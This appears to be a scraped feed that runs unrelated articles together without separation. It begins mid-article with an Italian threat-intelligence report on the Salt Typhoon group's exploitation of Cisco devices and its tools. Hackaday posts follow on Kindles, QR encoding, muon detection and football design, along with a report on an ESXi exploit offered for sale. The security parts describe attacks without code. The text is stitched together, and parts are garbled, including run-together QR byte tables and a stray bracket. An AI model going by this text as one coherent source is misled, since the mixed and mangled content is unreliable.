Recenti rapporti indicano che il gruppo ha mirato a diversi fornitori di telecomunicazioni e università in vari paesi, principalmente Stati Uniti, Regno Unito, Sudafrica. Queste incursioni hanno permesso agli hacker di compromettere dispositivi cruciali, estraendo informazioni sensibili come dati scientifici e tecnologia proprietaria.
Da quanto viene riportato dalle dashboard della piattaforma di intelligence di Recorded Future (Partner strategico di Red Hot Cyber), gli attacchi hanno iniziato ad aumentare in modo sensibile da febbraio di questo anni con dei picchi nelle date del 13 e del 21 di questo mese.
Lo sfruttamento delle CVE di CISCO IOS XE
Dall’inizio di dicembre 2024, Salt Typhoon (RedMike) ha tentato di sfruttare oltre 1.000 dispositivi di rete Cisco esposti su Internet in tutto il mondo, principalmente quelli associati ai provider di telecomunicazioni, utilizzando una combinazione di due vulnerabilità di escalation dei privilegi: CVE-2023-20198 e CVE-2023-20273. Una volta compromesso con successo, il gruppo utilizza il nuovo account utente privilegiato per modificare la configurazione del dispositivo e aggiunge un tunnel GRE per l’accesso persistente e l’esfiltrazione dei dati.
La vulnerabilità di escalation dei privilegi CVE-2023-20198 è stata trovata nella funzionalità Web UI del software Cisco IOS XE, versione 16 e precedenti, e pubblicata da Cisco nell’ottobre 2023. Gli aggressori sfruttano questa vulnerabilità per ottenere l’accesso iniziale al dispositivo ed emettono un comando privilege 15 per creare un utente locale e una password. In seguito, l’aggressore utilizza il nuovo account locale per accedere al dispositivo e sfrutta una vulnerabilità di escalation dei privilegi associata, CVE-2023-20273, per ottenere i privilegi di utente root.
Oltre la metà dei dispositivi Cisco presi di mira da RedMike si trovavano negli Stati Uniti, in Sud America e in India. I dispositivi rimanenti si estendevano su oltre 100 altri paesi. Sebbene i dispositivi selezionati siano principalmente associati a provider di telecomunicazioni, tredici erano collegati a università in Argentina, Bangladesh, Indonesia, Malesia, Messico, Paesi Bassi, Thailandia, Stati Uniti e Vietnam.
Tale comportamento mette in evidenza la minaccia continua rappresentata dagli attori sponsorizzati dagli stati e la loro capacità di compromettere la sicurezza nazionale. Particolarmente preoccupante è la strategia di Salt Typhoon di sfruttare vulnerabilità nei dispositivi Cisco.
Gli obiettivi di Salt Typhoon (RedMike)
La Cina ha sviluppato un’ampia rete di operazioni di spionaggio informatico mirate a istituzioni accademiche, aziende e governi stranieri, con l’obiettivo di ottenere vantaggi strategici in settori chiave come l’intelligenza artificiale, la crittografia e la tecnologia quantistica. Gruppi di hacker sponsorizzati dallo Stato, come Brass Typhoon APT41 e Violet Typhoon APT31, sono stati collegati a campagne di attacco sofisticate che sfruttano vulnerabilità nei sistemi informatici di università e centri di ricerca per esfiltrare dati sensibili. Queste operazioni non si limitano al cyberspazio, ma coinvolgono anche il reclutamento di ricercatori e studenti stranieri attraverso programmi di scambio accademico e collaborazioni scientifiche, che spesso fungono da copertura per il trasferimento illecito di conoscenze.
Parallelamente, il governo cinese utilizza società di copertura e joint venture con istituzioni occidentali per acquisire tecnologie emergenti senza destare sospetti. Attraverso iniziative come il programma “Thousand Talents”, Pechino ha incentivato il rientro di scienziati e ingegneri cinesi dall’estero, spesso con informazioni e brevetti ottenuti illegalmente.
Inoltre, le cyber-operazioni cinesi hanno preso di mira fornitori di infrastrutture critiche, tra cui aziende di telecomunicazioni e contractor della difesa, con l’intento di compromettere la sicurezza delle comunicazioni e raccogliere dati di intelligence strategici. Queste attività, sempre più sofisticate, come quelle di Salt Typhoon (RedMike), hanno portato a crescenti tensioni tra la Cina e le potenze occidentali, con sanzioni e misure di ritorsione da parte di Stati Uniti ed Europa per contrastare l’aggressiva espansione dello spionaggio informatico cinese.
Gli attacchi di Febbraio 2025
Il 15 febbraio 2025, Salt Typhoon ha sferrato moltissimi attacchi che hanno colpito 13 università e cinque fornitori di servizi Internet, inclusi quelli in Italia. Queste aggressioni segnano un notevole incremento della campagna di Salt Typhoon, considerata una delle più grandi operazioni di cyber-spionaggio condotte dalla Cina contro gli Stati Uniti. Le conseguenze di questi attacchi non si limitano a violazioni immediate dei dati, ma pongono interrogativi sugli impatti a lungo termine sulla ricerca accademica e sull’innovazione tecnologica.
E’ stata violata con successo un’affiliata statunitense di una società di telecomunicazioni del Regno Unito, vari provider di servizi Internet (ISP) e 13 università, tra cui importanti istituzioni come l’UCLA. Nel corso del mese di febbraio, Cisco ha confermato che questa falla è stata utilizzata per colpire le reti di telecomunicazione statunitensi, dimostrando la persistenza del gruppo nell’utilizzare sia le vulnerabilità consolidate che quelle più recenti per mantenere l’accesso ai sistemi compromessi.
Gli attacchi non si sono limitati agli Stati Uniti, ma si sono estesi anche a entità internazionali, tra cui ISP in Italia, Sudafrica e Thailandia. L’ampiezza di questi attacchi ha destato notevoli preoccupazioni per quanto riguarda la sicurezza dei dati sensibili e l’integrità delle infrastrutture di telecomunicazione su scala globale.
In generale le attività malevole di Salt Typhoon (Red Mike) hanno sfruttato le vulnerabilità identificate come CVE-2023-20198 e CVE-2023-20273, che hanno facilitato l’accesso non autorizzato ai router Cisco IOS XE. Ciò ha permesso agli aggressori di manipolare i dispositivi di rete e potenzialmente di esfiltrare dati sensibili.
Malware utilizzato da Salt Typhoon per compromettere le reti
Salt Typhoon (RedMike) dopo aver avuto accesso e compromesso i router CISCO, impiega una serie di sofisticati malware per infiltrarsi e compromettere le reti in vari settori.
MASOL RAT
Uno degli strumenti principali del loro arsenale è una versione personalizzata del MASOL RAT (Remote Access Trojan),che consente agli aggressori di ottenere il controllo remoto dei sistemi infetti.
Questo malware è particolarmente efficace nell’esfiltrazione di dati sensibili, nel monitoraggio delle attività degli utenti e nell’esecuzione di comandi sulle macchine compromesse. L’uso del MASOL RAT evidenzia l’attenzione strategica di Salt Typhoon per la furtività e la persistenza, che gli consentono di mantenere l’accesso a lungo termine alle reti mirate senza essere individuati.
MASOL RAT, tracciato da TrendMicro dal 2020 può essere utilizzato per prendere di mira entità governative del sud-est asiatico. In base alla stringa PDB della backdoor (E:\Masol_https190228\x64\Release\Masol.pdb), si ritiene che il Remote Access Trojan possa essere stata sviluppato già nel 2019. E’ stata osservata anche una nuova variante Linux in circolazione dopo il 2021.
JumbledPath
In un rapporto pubblicato da Cisco Talos il 20 febbraio, i ricercatori hanno confermato che Salt Typhoon ha ottenuto l’accesso all’infrastruttura di rete principale tramite dispositivi Cisco e ha poi utilizzato tale infrastruttura per raccogliere una serie di informazioni.
L’approccio di Salt Typhoon per ottenere l’accesso iniziale ai dispositivi Cisco è quello di ottenere le credenziali di accesso legittime della vittima utilizzando tecniche LOTL (Living-off-the-Land) sui dispositivi di rete.
Salt Typhoon (RedMike) ha utilizzato un’utilità personalizzata, denominata JumbledPath, che gli ha consentito di eseguire un’acquisizione di pacchetti su un dispositivo Cisco remoto tramite un jump-host definito dall’attore. Questo strumento ha anche tentato di cancellare i log e compromettere la registrazione lungo il jump-path e restituire l’acquisizione compressa e crittografata risultante tramite un’altra serie unica di connessioni o jump definiti dall’attore.
Ciò ha consentito all’attore della minaccia di creare una catena di connessioni ed eseguire l’acquisizione su un dispositivo remoto. L’utilizzo di questa utilità contribuirebbe a offuscare la fonte originale e la destinazione finale della richiesta e consentirebbe inoltre al suo operatore di muoversi attraverso dispositivi o infrastrutture potenzialmente altrimenti non raggiungibili pubblicamente (o instradabili).
Questa utility è stata scritta in GO e compilata come binario ELF usando un’architettura x86-64. La compilazione dell’utility usando questa architettura la rende ampiamente utilizzabile su sistemi operativi Linux, che includono anche una varietà di dispositivi di rete multi-vendor. Questa utility è stata trovata in istanze Guestshell configurate dall’attore su dispositivi Cisco Nexus.
L’autore della minaccia ha modificato ripetutamente l’indirizzo dell’interfaccia loopback su uno switch compromesso e ha utilizzato tale interfaccia come origine di connessioni SSH ad altri dispositivi all’interno dell’ambiente di destinazione, il che gli ha consentito di aggirare di fatto gli elenchi di controllo di accesso (ACL) in vigore su tali dispositivi.
Un tipico attacco di Salt Typhoon
Salt Typhoon (RedMike), spesso prevede un approccio multiforme che sfrutta vulnerabilità note in dispositivi di rete ampiamente utilizzati, in particolare quelli di Cisco.
Un altro comportamento degno di nota mostrato da Salt Typhoon consiste nello sfruttare le tecniche LOTL (Living-off-the-Land) sui dispositivi di rete, abusando dell’infrastruttura affidabile come punto di snodo per passare da una società di telecomunicazioni all’altra. Di seguito viene riportata l’infrastruttura di sfruttamento di Salt Typhoon:
Ricognizione
Salt Typhoon inizia con un’ampia ricognizione per identificare i potenziali obiettivi all’interno delle infrastrutture critiche, come i fornitori di telecomunicazioni e le istituzioni scolastiche. Questa fase può comportare la scansione dei dispositivi vulnerabili, la raccolta di informazioni sulle configurazioni di rete e l’identificazione del personale chiave.
Sfruttamento delle vulnerabilità
Il gruppo sfrutta spesso specifiche vulnerabilità nei dispositivi Cisco. Ad esempio, è noto che sfrutta vulnerabilità come CVE-2018-0171 e CVE-2023-20198. Queste vulnerabilità consentono agli aggressori di ottenere l’accesso non autorizzato ai dispositivi di rete inviando messaggi o comandi artigianali, provocando condizioni di denial-of-service o l’esecuzione di codice arbitrario.
Accesso iniziale e furto di credenziali
Una volta ottenuto l’accesso iniziale attraverso lo sfruttamento delle vulnerabilità, Salt Typhoon utilizza spesso malware come il MASOL RAT (come visto in precedenza) o kit di exploit personalizzati. Questi strumenti consentono agli aggressori di stabilire un punto d’appoggio all’interno della rete, di esfiltrare dati sensibili e di raccogliere credenziali legittime per ulteriori accessi. Il furto di credenziali è cruciale perché consente di aumentare il livello di accesso.
Come difendersi dagli attacchi di Salt Typhoon
Salt Typhoon (RedMike) ha tentato di sfruttare più di 1.000 dispositivi Cisco a livello globale. Il gruppo ha probabilmente compilato un elenco di dispositivi target in base alla loro associazione con le reti dei provider di telecomunicazioni. Insikt Group di Recorded Future ha anche osservato che RedMike stava prendendo di mira dispositivi associati a università in Argentina, Bangladesh, Indonesia, Malesia, Messico, Paesi Bassi, Thailandia, Stati Uniti (USA) e Vietnam.
Per proteggersi dagli attacchi di Salt Typhoon (RedMike), le organizzazioni devono implementare una strategia di cybersecurity completa che enfatizzi la gestione delle vulnerabilità, la sicurezza della rete e la formazione dei dipendenti. Ecco alcune misure chiave da considerare:
- Gestione delle patch: Aggiornare e applicare regolarmente le patch a tutto il software, in particolare ai dispositivi di rete come router e switch Cisco. Assicurarsi che le vulnerabilità note, come CVE-2018-0171, CVE-2023-20198 e CVE-2023-20273, vengano affrontate tempestivamente.
- Segmentazione della rete: Implementare la segmentazione della rete per limitare gli spostamenti laterali all’interno della rete. Ciò rende più difficile per gli aggressori accedere ai sistemi critici se riescono a compromettere una parte meno sicura della rete.
- Controlli di accesso: Applicare controlli di accesso rigorosi e il principio del minimo privilegio. Assicurarsi che gli utenti abbiano solo l’accesso necessario per i loro ruoli e rivedere e aggiornare regolarmente queste autorizzazioni.
- Autenticazione a più fattori (MFA): Abilitare l’autenticazione a più fattori per l’accesso a sistemi e applicazioni sensibili per aggiungere un ulteriore livello di sicurezza contro il furto di credenziali.
- Monitoraggio e rilevamento: Implementare solidi sistemi di monitoraggio e di rilevamento delle intrusioni per identificare attività insolite e potenziali violazioni. [Esaminare regolarmente i registri e gli avvisi di sicurezza per individuare eventuali segnali di comportamento sospetto.
- Piano di risposta agli incidenti: Sviluppare e aggiornare regolarmente un piano di risposta agli incidenti che delinei le procedure di risposta agli incidenti di cybersecurity. [6]
Conclusioni
Salt Typhoon è salito alla ribalta a causa della sua recente infiltrazione nell’infrastruttura delle telecomunicazioni commerciali. I senatori statunitensi hanno definito l’attacco “strabiliante”, affermando che dovrebbe fungere da “campanello d’allarme” per le aziende che si ritiene siano state violate, tra cui AT&T, Verizon e Lumen.
RedMike ha probabilmente preso di mira queste università per accedere alla ricerca in aree correlate a telecomunicazioni, ingegneria e tecnologia, in particolare presso istituzioni come UCLA e TU Delft. Oltre a questa attività, a metà dicembre 2024, RedMike ha anche eseguito una ricognizione di più indirizzi IP di proprietà di un provider di telecomunicazioni con sede in Myanmar, Mytel.
La continua esposizione di vulnerabilità nei dispositivi Cisco ha portato a una crescente preoccupazione tra i fornitori di servizi e le istituzioni, costringendoli a rivedere le loro strategie di sicurezza. È diventato evidente che la protezione delle reti e dei dati è di fondamentale importanza per preservare non solo la sicurezza nazionale, ma anche la fiducia del pubblico nei sistemi digitali.
Di fronte a queste minacce in evoluzione, esperti del settore e professionisti della cybersicurezza sottolineano l’importanza di misure di sicurezza robuste e difese proattive. È necessario che le organizzazioni conducano approfondite valutazioni delle loro reti, focalizzandosi in particolare sulle vulnerabilità all’interno dei dispositivi Cisco. La situazione attuale serve da monito sulla necessità di una vigilanza continua contro avversari sofisticati come Salt Typhoon e i suoi affiliati.
Mentre il gruppo continua a lanciare attacchi mirati contro infrastrutture critiche e istituzioni educative, è fondamentale che le organizzazioni di tutto il mondo migliorino le loro posture di sicurezza e collaborino per condividere informazioni, riducendo i rischi posti da tali minacce informatiche. La battaglia contro il cyber spionaggio è tutt’altro che finita, e solo attraverso uno sforzo collettivo la comunità internazionale può sperare di salvaguardare le proprie frontiere digitali.
Questo articolo è stato redatto attraverso l’utilizzo della piattaforma di Recorded Future, partner strategico di Red Hot Cyber e Leader Mondiale nell’intelligence sulle minacce informatiche, che fornisce analisi avanzate per identificare e contrastare le attività malevole nel cyberspazio.
L'articolo Salt Typhoon (RedMike): La Cyber Minaccia Cinese che Sta Scuotendo il Mondo proviene da il blog della sicurezza informatica.
Shelved Kindle Gets New Life as Weather Display
In the rush to always have the latest and greatest, it’s not uncommon that perfectly serviceable hardware ends up collecting dust in a drawer somewhere. If you’ve got an old Kindle laying around, you may be interested in this write-up from [Hemant] that shows a practical example of how the popular e-reader can be pushed into service as a weather dashboard.
The Kindle has a number of quirks and issues that [Hemant] covers as well, including handling image ghosting on the e-ink display as well as a problem where the device will hang if the Internet connection is lost. For those with jailbroken Kindles that want to put their devices back into useful service, this is an excellent guide for getting started and [Hemant] also provided all of the source code on the project’s GitHub page.
There has been a long tradition of using Kindles for things other than e-readers, and even devices with major hardware problems can still have useful life in them thanks to this project which allows the e-ink display to have a second life on its own.
Exploit Zeroday per VMware ESXi in vendita sul Dark Web per 150.000 dollari
Un presunto exploit zero-day per VMware ESXi è apparso nei forum underground, offerto da un criminale informatico noto come “Vanger“.
Secondo le informazioni trapelate, l’exploit consentirebbe l’evasione dalla macchina virtuale (VM Escape), una delle minacce più critiche per gli ambienti virtualizzati. Il prezzo? 150.000 dollari. Ma è reale o un ennesimo tentativo di frode?
Il pericolo del VM Escape
Se autentico, questo exploit potrebbe consentire agli attaccanti di bypassare il livello di isolamento garantito dall’hypervisor ESXi, compromettendo il sistema host e le altre VM in esecuzione sullo stesso server. Ciò significa accesso non autorizzato ai dati sensibili, diffusione di malware e possibilità di movimento laterale all’interno della rete aziendale.
Le versioni affette sarebbero comprese tra la 5.5 e la 8.0, inclusi aggiornamenti specifici come ESXi 8.0 Update 3c e versioni precedenti. L’inserzione di Vanger elenca dettagliati numeri di build, suggerendo una conoscenza approfondita dell’ecosistema VMware.
Affare reale o ennesima truffa nei forum underground?
Non è la prima volta che sui marketplace del dark web vengono messi in vendita exploit con promesse da capogiro. Tuttavia, il venditore non vanta una reputazione solida nel settore degli exploit: le sue precedenti attività si limitavano alla vendita di credenziali di accesso aziendali compromesse.
Questo solleva forti dubbi sull’autenticità dell’exploit e sull’affidabilità della fonte. Potrebbe trattarsi di una frode? Assolutamente sì, ma il rischio che sia reale non può essere sottovalutato.
Le contromisure: come proteggersi da un possibile attacco
Indipendentemente dalla veridicità di questa minaccia, il solo fatto che venga pubblicizzata dimostra come le infrastrutture virtualizzate siano nel mirino del cybercrime. Le aziende devono adottare un approccio di sicurezza a più livelli per proteggere i propri ambienti:
- Patch Management: aggiornare regolarmente VMware ESXi e gli strumenti associati per chiudere le vulnerabilità note.
- Isolamento: limitare le funzionalità di condivisione tra VM e host, come clipboard e cartelle condivise.
- Monitoraggio: implementare soluzioni di sicurezza avanzate per rilevare attività sospette sia sulle VM che sull’host.
- Access Control: restringere i privilegi amministrativi e applicare l’autenticazione a più fattori per l’accesso agli hypervisor.
Conclusione
Che sia un inganno o meno, questo presunto exploit zero-day mette in luce una realtà inconfutabile: gli attori delle minacce stanno puntando sempre più aggressivamente alle infrastrutture virtualizzate.
La sicurezza non è un’opzione, ma una necessità. Mantenere i sistemi aggiornati e implementare misure di protezione robuste è l’unica difesa contro un panorama di minacce in continua evoluzione.
L'articolo Exploit Zeroday per VMware ESXi in vendita sul Dark Web per 150.000 dollari proviene da il blog della sicurezza informatica.
SHOUT For Smaller QR Codes
QR codes have been with us for a long time now, and after passing through their Gardenesque hype cycle of inappropriate usage, have now settled down to be an important and ubiquitous part of life. If you have ever made a QR code you’ll know all about trying to generate the most compact and easily-scannable one you can, and for that [Terence Eden] is here with an interesting quirk. Upper-case text produces smaller codes than lower-case.
His post takes us on a journey into the encoding of QR codes, not in terms of their optical pattern generation, but instead the bit stream they contain. There are different modes to denote different types of payload, and in his two examples of the same URL in upper- and lower- cases, the modes are different. Upper-case is encoded as alphanumeric, while lower-case, seemingly though also containing alphanumeric information, is encoded as bytes.
To understand why, it’s necessary to consider the QR codes’ need for efficiency, which led its designers to reduce their character set as far as possible and only define uppercase letters in their alphanumeric set. The upper-case payload is thus encoded using less bits per character than the lower-case one, which is encoded as 8-bit bytes. A satisfying explanation for a puzzle in plain sight.
Hungry for more QR hackery? This one contains more than one payload!
hackaday.com/2025/02/26/shout-…
Why are QR Codes with capital letters smaller than QR codes with lower-case letters?
shkspr.mobi/blog/2025/02/why-a…Take a look at these two QR codes. Scan them if you like, I promise there's nothing dodgy in them.
Left is upper-case
HTTPS://EDENT.TEL/and right is lower-casehttps://edent.tel/You can clearly see that the one on the left is a "smaller" QR as it has fewer bits of data in it. Both go to the same URl, the only difference is the casing.
What's going on?
Your first thought might be that there's a different level of error-correction. QR codes can have increasing levels of redundancy in order to make sure they can be scanned when damaged. But, in this case, they both have Low error correction.
The smaller code is "Type 1" - it is 21px * 21px. The larger is "Type 2" with 25px * 25px.
The official specification describes the versions in more details. The smaller code should be able to hold 25 alphanumeric character. But
https://edent.tel/is only 18 characters long. So why is it bumped into a larger code?Using a decoder like ZXING it is possible to see the raw bytes of each code.
UPPER
20 93 1a a6 54 63 dd 28 35 1b 50 e9 3b dc 00 ec11 ec 11
lower:41 26 87 47 47 07 33 a2 f2 f6 56 46 56 e7 42 e746 56 c2 f0 ec 11 ec 11 ec 11 ec 11 ec 11 ec 11ec 11
You might have noticed that they both end with the same sequence:ec 11Those are "padding bytes" because the data needs to completely fill the QR code. But - hang on! - not only does the UPPER one safely contain the text, it also has some spare padding?The answer lies in the first couple of bytes.
Once the raw bytes have been read, a QR scanner needs to know exactly what sort of code it is dealing with. The first four bits tell it the mode. Let's convert the hex to binary and then split after the first four bits:
Type HEX BIN Split UPPER 20 9300100000 100100110010 000010010011lower 41 2601000001 001001100100 000100100110The UPPER code is
0010which indicates it is Alphanumeric - the standard says the next 9 bits show the length of data.The lower code is
0100which indicates it is Byte mode - the standard says the next 8 bits show the length of data.
Type HEX BIN Split UPPER 20 9300100000 100100110010 0000 10010lower 41 2601000001 001001100100 000 10010Look at that! They both have a length of
10010which, converted to binary, is 18 - the exact length of the text.Alphanumeric users 11 bits for every two characters, Byte mode uses (you guessed it!) 8 bits per single character.
But why is the lower-case code pushed into Byte mode? Isn't it using letters and number?
Well, yes. But in order to store data efficiently, Alphanumeric mode only has a limited subset of characters available. Upper-case letters, and a handful of punctuation symbols:
space $ % * + - . / :Luckily, that's enough for a protocol, domain, and path. Sadly, no GET parameters.
So, there you have it. If you want the smallest possible physical size for a QR code which contains a URl, make sure the text is all in capital letters.
Table of Alphanumeric Values
When creating a QR code with alphanumeric mode, you need to know the alphanumeric values of the characters that you are encoding. See this table for reference.Thonky.com
District Heat Pump Systems Save Money and Gas Utilities
Ground-source heat pump systems are one of the most efficient ways to do climate control, but digging the wells can be prohibitively expensive for the individual citizen. What if you could do it at a larger scale?
Starting with a pilot to serve 37 commercial and residential buildings in Framingham, MA, Eversource is using its experience with natural gas drilling and pipe to serve up a lower carbon way to heat and cool this neighborhood. While district heating via geothermal has precedents elsewhere in the country, Boise is a notable example, it has remained a somewhat niche technology. Once networked, excess heat from one location can be used elsewhere in the system, like data centers or industrial facilities being used to heat homes in the winter.
As gas utilities look to transition away from fossil fuels, their existing knowledge base is a perfect fit for geothermal, but there are some regulatory hurdles. Six states have passed laws allowing natural gas utilities to expand beyond just gas, and bills have been filed in six more. This will likely accelerate with the formation of the Utility Networked Geothermal Collaborative which includes many utilities including giants like Dominion Energy who are looking to expand their energy portfolios.
If you want to dig more into district heating systems or geothermal energy, we’ve covered cogeneration from power plants to serve up the heat instead, doing it with wind, or even using old coal mines for geothermal heat.
Building a DIY Muon Tomography Device for About $100
Muon tomography (muography) is the practice of using muons generated by cosmic rays interacting with Earth’s atmosphere (or equivalent) to image structures on Earth’s surface, akin to producing an X-ray. In lieu of spending a lot of spending a fair bit of money on dedicated muon detectors, you can also hack such a device together with two Geiger-Müller tubes and related circuitry for about $100 or whatever you can source the components for.
The reason for having two Geiger-Müller tubes is to filter out the countless other (much more prevalent) sources of ionizing radiation that we’re practically bathed in every second. Helped by a sheet of lead between both tubes, only a signal occurring at the same time from both tubes should be a muon. Specially cosmic ray muons, as these have significantly more kinetic energy that allows them to pass through both tubes. As a simple check it’s helpful to know that most of these muons will come from the direction of the sky.
The author of the article tested this cobbled-together detector in an old gold mine. Once there the presence of more rock (and fewer muons) was easily detected, as well as a surge in muons indicating a nearby void (a mine shaft). While not a fast or super-easy way to image structures, it’s hard to beat for the price and the hours of fun you can have while spelunking.
Want a Truck with a Short Bed and a Long Camper Shell?
Camper shells are a time-honored piece of truck gear, but with modern trucks having increasingly vestigial beds, the length of your overnight abode has increasingly shrunk as well. To combat this problem, [Ed’s Garage] built a camper shell that extends once you’ve arrived at your campsite.
[Ed] wanted to keep things relatively low profile while still tall enough to sit up in for convenience, leading to a small bit of the shell peeking over the truck’s roof. To keep the cold Canadian winter out, attention was paid to proper weather sealing around the sliding portion of the shell so that it stays warm and dry inside.
While this would work on any truck, the mains power plugs in the bed of some modern trucks mean that certain glamping conveniences like a heater and projector can be easily powered while you’re in camp. We get to see the camper shell in action at the end of the video where the pros and cons of having your sleeping space also being your storage while en route become apparent.
If you’re looking for something a little less conventional for your camping experience, how about this solar camper or this retro bike camper?
youtube.com/embed/MfxifnxYbPI?…
FLOSS Weekly Episode 822: Nand2Tetris
This week, Jonathan Bennett and Rob Campbell talk with Shimon Schocken about Nand2Tetris, the free course about building a computer from first principles. What was the inspiration for the course? Is there a sequel or prequel in the works? Watch to find out!
youtube.com/embed/X-CavXZjfGU?…
Did you know you can watch the live recording of the show right on our YouTube Channel? Have someone you’d like us to interview? Let us know, or contact the guest and have them contact us! Take a look at the schedule here.
play.libsyn.com/embed/episode/…
Direct Download in DRM-free MP3.
If you’d rather read along, here’s the transcript for this week’s episode.
Places to follow the FLOSS Weekly Podcast:
Theme music: “Newer Wave” Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
hackaday.com/2025/02/26/floss-…
Too Smooth: Football and the “KnuckleBall” Problem
Picture a football (soccer ball) in your head and you probably see the cartoon ideal—a roughly spherical shape made with polygonal patches that are sewn together, usually in a familiar pattern of black and white. A great many balls were made along these lines for a great many decades.
Eventually, though, technology moved on. Footballs got rounder, smoother, and more colorful. This was seen as a good thing, with each new international competition bringing shiny new designs with ever-greater performance. That was, until things went too far, and the new balls changed the game. Thus was borne the “knuckleball” phenomenon.
Smoother Is Better, Right?
From the late industrial era onwards, footballs were traditionally made with leather panels wrapped around some form of rubber bladder. As it’s not easy to produce a seamless leather sphere, balls were instead sewn together from individual leather panels in order to create a vaguely spherical whole. Early designs had few panels, and weren’t particularly good at approximating the shape of a sphere. They often had large, wide seams that stretched far across the surface of the ball. Larger seams were by and large undesirable, as they made the ball harder to control. Ridges where the panels met could catch on the foot and lead to unpredictable behavior.
Over time, there was a desire to create smoother, rounder balls for professional play. By the 1970s, football designs began to coalesce around a common format. The standard became 12 pentagonal and 20 hexagonal panels, which could be sewn together into a relatively good approximation of a sphere. This also allowed the construction of a ball with very fine seams, creating a more predictable ball which enabled far finer control. The format was perhaps best popularized by the Adidas Telstar as used in the 1970 and 1974 World Cups. Even though it wasn’t the first to use the 12-and-20 design, the layout and the black-and-white pattern has been firmly etched in footballing consciousness ever since. Indeed, starting at the 1970 World Cup, Adidas has made every following World Cup ball since.
For a time, it seemed as if the design of the football was settled science. Adidas stuck with the 32-panel design up until the 2006 World Cup, when it revealed the +Teamgeist design. It used 14 curved panels that were bonded instead of stitched, creating a smoother ball for yet more predictable handling. It was also intended that the design would be more waterproof, to avoid gaining weight in wet matches. The ball was criticised by some for its erratic flight patterns, but by and large was seen as fit for purpose.
With another successful World Cup under its belt, Adidas innovated further for the 2010 World Cup. It created the Jabulani, which consisted of just eight spherically-moulded panels bonded together into an ultra-smooth and cohesive sphere. If the 2006 World Cup ball was slightly controversial, the Jabulani was outrageous. The ball was referred to as “supernatural” for its tendency to suddenly change direction in flight, which pleased strikers to a degree, but frustrated goalkeepers to no end. Ultimately, though, this tendency wasn’t good for getting balls on target. Just 147 goals were scored in the 2010 World Cup, the fewest since the competition changed its tournament format in 1998.
The problem came down to a phenomenon known as “knuckling.” This happens when the ball is travelling through the air with little to no spin. At a certain speed, the seams on the ball tend to interact with the airflow, channeling it such that it creates sudden and unpredictable movements. The term first developed in baseball, but became relevant to football with the development of the 2006 and 2010 World Cup balls, which suffered this phenomenon more often in play.
The phenomenon became so well known that NASA scientists took the opportunity to throw World Cup balls in a test chamber to demonstrate the effects at play. Knuckling behavior tends to peak at a certain critical speed, with the effect lessened either side of the peak. The problem was that the smoother designs were “knuckling” at higher speeds than balls from previous generations. NASA researchers found that the Jabulani would undergo unpredictable flight due to knuckling at speeds of 50 to 55 mph—right around the speed at which professional strikers can deliver a ball to the net. Meanwhile, more traditional 32-panel balls tend to see a peak in knuckling around 30 mph. Since strikers were typically kicking beyond this speed, knuckling—and thus unpredictable flight—wasn’t such a problem with the older designs.
Being well aware of the problem after the 2010 World Cup, Adidas went back to the drawing board and developed the Brazuca for the 2014 competition. The number of panels was reduced yet further to just six. However, Adidas wasn’t intending to just go smoother yet again. Instead, the Brazuca had longer, deeper seams than the Jabulani, and panels covered in textured bumps. Through the company’s careful design efforts, this brought the critical knuckling speed back down to around 30 mph, much more akin to a traditional 32-panel ball.
By and large, the Brazuca proved far less controversial than its two predecessors. Search for articles on the 2014 ball, and you’ll find a little speculation from before the World Cup, before the story died completely once competition began. No more were unpredictable balls confounding the world’s finest footballers. Meanwhile, democratically speaking, where the +Teamgeist and Jabulani each have hundreds of words spilled on Wikipedia over controversy and criticism, the Brazuca has none.
The story of the Jabulani is one of unintended consequences. Adidas had intended to improve its product in a predictable and routine manner, only to find an unexpected effect at play which threw a spanner in the works. Once the effect was understood, it could be controlled and refined out with careful design. Football hasn’t suffered a “supernatural” ball since, even as the technology marches ever further into the Smart Ball era. Still, who knows what comes next at the 2026 World Cup?
UL Investigates the Best Way to Fight EV Fires
While electric vehicles (EVs) are generally less likely to catch fire than their internal combustion counterparts, it does still happen, and firefighters need to be ready. Accordingly, the UL Research Institute is working with reverse engineering experts Munro & Associates to characterize EV fires and find the best way to fight them.
There is currently some debate in the firefighting community over whether it’s better to try to put an EV battery fire out with water or to just let it burn. Research like this means the decision doesn’t have to fall on only anecdotal evidence. Anyone who’s worked in a lab will recognize the mix of exceedingly expensive equipment next to the borderline sketchy rigged up hacks on display, in this case the super nice thermal imagers and a “turkey burner on steroids.” The video goes through some discussion of the previous results with a Chevy Bolt, Hyundai Kona, Ford Mustang Mach E, and then we get to see them light up a Tesla Model 3. This is definitely one you shouldn’t try at home!
While the massive battery banks in modern EVs can pose unique challenges in the event of an accident, that doesn’t mean they can’t be repurposed to backup your own home.
youtube.com/embed/kOz0ewP5fdM?…
Hackaday Europe 2025: Workshops and More Speakers
We’re proud to announce the last round of speakers, as well as the two workshops that we’ll be running at 2025 Hackaday Europe in Berlin on March 15th and 16th — and Friday night the 14th, if you’re already in town.
The last two years that we’ve done Hackaday Europe in Berlin have been awesome, and this year promises to keep up the tradition. We can’t wait to get our hands on the crazy selection of SAO badge addons that are going to be in each and every schwag bag.
Tickets for the event itself are going fast, but the workshop tickets that go on sale at 8:00 AM PST sell out even faster. And you need the one to enjoy the other, so get your tickets now!
Giovanni Salinas
Manufacturing the Hackaday Supercon Badge
When the Hackaday community gathers for Supercon, curious makers dig into their swag bag looking for the undisputed most sought-after piece of swag: the Supercon Badge. In this talk we will explore how idealistic manufacturing principles crash face-first with capricious electronic designs and unreasonable deadlines, and how through love, collaboration and ingenuity, the Hackaday community rises to the challenge and saves the day.
Rehana Al-Soltane
Make PCBs Bend Over Backwards for You
PCBs-as-we-know-them are usually flat and rigid, but what if you could create flexible boards in the shape of anything your heart desires? In this talk, I’ll explain how I created a flexible PCB in the shape of a crown while at MIT, using a Javascript- and web-based open-source tool. Discussing code-based techniques and pitfalls, there will be helpful points for you to consider when embarking on your own journey when creating flexible PCBs.
Christel Sanders
HEU1993 to WHY2025: Dutch hacker camps from the past and the future
This history lesson will go in depth in the history of the Dutch Hacker Camps, their culture, influence and the projects through the years.
Francis Stokes
More Than Motors: Decoding the Software Behind Pen Plotters and CNC Devices
When it comes to building CNC-type devices, much of the information out there emphasises the mechanical and electrical assembly; The gears, belts, motors, and wires. But what about the firmware that brings these machines to life? This talk covers the often-overlooked software magic that drives pen plotters, 3D printers, and CNC mills!
Workshops
Matthew Venn
Tiny Tapeout
